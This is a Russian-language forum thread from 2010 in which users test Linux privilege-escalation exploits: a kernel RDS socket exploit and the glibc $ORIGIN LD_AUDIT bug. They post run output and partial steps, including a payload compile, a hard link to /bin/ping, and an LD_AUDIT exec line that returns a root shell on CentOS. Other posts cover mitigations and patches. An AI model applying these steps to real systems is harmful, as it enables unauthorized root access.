Linux video_srv 2.6.32-ARCH
увы и ах
| |
|
3.127, Вова (?), 09:18, 20/10/2010 [^] [^^] [^^^] [ответить]
| +/– |
$ ./a.out
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
[+] Resolved security_ops to 0xffffffff81c44e50
[+] Resolved default_security_ops to 0xffffffff81a3daa0
[+] Resolved cap_ptrace_traceme to 0xffffffff811c73f4
[+] Resolved commit_creds to 0xffffffff81056b7b
[+] Resolved prepare_kernel_cred to 0xffffffff81056a37
[*] Could not open socket.
~ $
uname -a
Linux 2.6.34.1 #5 SMP Tue Aug 24 15:56:29 MSD 2010 x86_64 AMD Athlon(tm) 64 X2 Dual Core Processor 5000+ AuthenticAMD GNU/Linux
| |
|
4.128, korrado (?), 09:44, 20/10/2010 [^] [^^] [^^^] [ответить]
| +/– |
ls -l /bin/ping
если для не юзера стоит r-x, эсплойт работает (Мандривы, Федоры, Убанты)
если стоит, --x, то не работает (Слаки и другие)
| |
|
5.138, Вова (?), 13:45, 20/10/2010 [^] [^^] [^^^] [ответить]
| +/– |
> ls -l /bin/ping
> если для не юзера стоит r-x, эсплойт работает (Мандривы, Федоры, Убанты)
> если стоит, --x, то не работает (Слаки и другие)
в данной теме присутствуют два эксплойта, один скриптом (вы о нём), другой программкой.
| |
|
|
|
|
1.132, АнонимМ (?), 11:48, 20/10/2010 [ответить] [﹢﹢﹢] [ · · · ]
| +/– |
Что-то в Red Hat Enterprise Linux Server release 5.1 (Tikanga) работать не хотит.
bea@yam-ind:/tmp>gcc -w -fPIC -shared -o /tmp/exploit payload.c
payload.c:7: ошибка: redefinition of ‘init’
payload.c:2: ошибка: previous definition of ‘init’ was here
glibc-2.5-18
Что-то пока не страшно.
| |
|
2.134, ifel (??), 12:02, 20/10/2010 [^] [^^] [^^^] [ответить]
| +/– |
> Что-то в Red Hat Enterprise Linux Server release 5.1 (Tikanga) работать не
> хотит.
> bea@yam-ind:/tmp>gcc -w -fPIC -shared -o /tmp/exploit payload.c
> payload.c:7: ошибка: redefinition of ‘init’
> payload.c:2: ошибка: previous definition of ‘init’ was here
> glibc-2.5-18
> Что-то пока не страшно.
Что-то у Вас в .c file ошибка, а не работать не хочет. Проверьте, что вставили все один раз и без спец символов.
Да и RHEL 5.1 как бы outdated уже, там остального добра думаю хватит, даже если это и не работает.
| |
|
1.135, TS (ok), 12:59, 20/10/2010 [ответить] [﹢﹢﹢] [ · · · ]
| +1 +/– |
Умные люди давно следуют рекомендациям по безопасности. например от NSA.
Открываем "Guide to the Secure Configuration of Red Hat Enterprise Linux 5" - http://www.nsa.gov/ia/_files/os/redhat/rhel5-guide-i731.pdf - читаем -
2.1.1.1.1 Create Separate Partition or Logical Volume for /tmp
2.1.1.1.2 Create Separate Partition or Logical Volume for /var
...
2.1.1.1.5 Create Separate Partition or Logical Volume for /home if Using Local Home Directories
...
2.2.1.3 Add nodev, nosuid, and noexec Options to Temporary Storage Partitions
2.2.1.4 Bind-mount /var/tmp to /tmp
...
2.2.3.4 Find Unauthorized SUID/SGID System Executables
| |
1.148, буба (?), 15:31, 20/10/2010 [ответить] [﹢﹢﹢] [ · · · ]
| +/– |
Ubuntu 10.04:
moo@moo:~$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
Inconsistency detected by ld.so: dl-open.c: 231: dl_open_worker: Assertion '(call_map)->l_name[0] == '\0'' failed!
| |
|
2.150, буба (?), 15:45, 20/10/2010 [^] [^^] [^^^] [ответить]
| +/– |
CentOS 5.3
[moo@co53 ~]$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
[root@co53 ~]#
| |
|
3.154, буба (?), 16:42, 20/10/2010 [^] [^^] [^^^] [ответить]
| +/– |
После "yum update glibc" с версии 2.5.34 до 2.5.49 и пересборки эксплоит все-равно работет на CentOS.
| |
|
4.190, буба (?), 18:41, 21/10/2010 [^] [^^] [^^^] [ответить]
| +/– |
Сегодня вышел апдейт glibc, после которого $ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3 вырубает шелл.
| |
|
|
|
1.191, Аноним (-), 20:26, 21/10/2010 [ответить] [﹢﹢﹢] [ · · · ]
| +/– |
I just can't create the link from /bin/ping to /tmp/exploit/target
ln: creating hard link 'exploit/target' => '/bin/ping': Invalid cross-device link
| |
1.192, paxuser (ok), 00:18, 22/10/2010 [ответить] [﹢﹢﹢] [ · · · ]
| +/– |
Сегодня на #grsecurity:
<taviso> kees: we pwned you :)
<taviso> (check your mail)
<kees> taviso: aaah craps
<kees> taviso: nice work :)
<taviso> thanks :D
<spender> AHH CRAPS
<kees> taviso: well, no worries, the glibc update was waiting in the wings anyway. I'll get it published. :)
<spender> I INFERR THAT UBUNTU IS VULN TO THE GLIBC BUG
<spender> and i guess all other eglibc users too? :p
| |
1.194, Аноним (-), 06:07, 23/10/2010 [ответить] [﹢﹢﹢] [ · · · ]
| +/– |
ln /bin/ping /tmp/exploit/target
ln: создание жесткой ссылки '/tmp/exploit/target' => '/bin/ping': Операция не позволяется
OpenSUSE 11.3 // Kernel 2.6.35.4 + Ubuntu patches + BFQ + BFS
Наверное yama мли apparmor виноваты....
| |
|
2.195, paxuser (ok), 08:06, 23/10/2010 [^] [^^] [^^^] [ответить]
| +/– |
> ln /bin/ping /tmp/exploit/target
> ln: создание жесткой ссылки '/tmp/exploit/target' => '/bin/ping': Операция не позволяется
Для эксплуатации второй уязвимости хардлинки не нужны.
| |
|
|